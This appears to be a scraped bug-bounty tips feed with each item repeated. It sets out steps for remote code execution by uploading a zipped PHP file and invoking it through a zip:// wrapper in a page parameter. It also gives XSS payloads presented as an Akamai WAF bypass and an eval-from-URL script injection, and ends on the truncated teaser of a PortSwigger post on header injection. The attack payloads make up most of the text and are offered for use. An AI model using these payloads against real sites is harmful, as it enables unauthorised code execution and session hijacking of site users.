Bug Bounty Hunting Tip :-
If you can upload .zip file on target then:
1. Create a .php file (rce.php)
2. Compress it to a .zip file (file.zip)
3. Upload your .zip file on the vulnerable web application.
4. Trigger your RCE via:
( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )
If you can upload .zip file on target then:
1. Create a .php file (rce.php)
2. Compress it to a .zip file (file.zip)
3. Upload your .zip file on the vulnerable web application.
4. Trigger your RCE via:
( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )
Akamai WAF bypass
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
PortSwigger Research
Making HTTP header injection critical via response queue poisoning
HTTP header injection is often under-estimated and misclassified as a moderate severity flaw equivalent to XSS or worse, Open Redirection. In this post, I'll share a simple technique I used to take a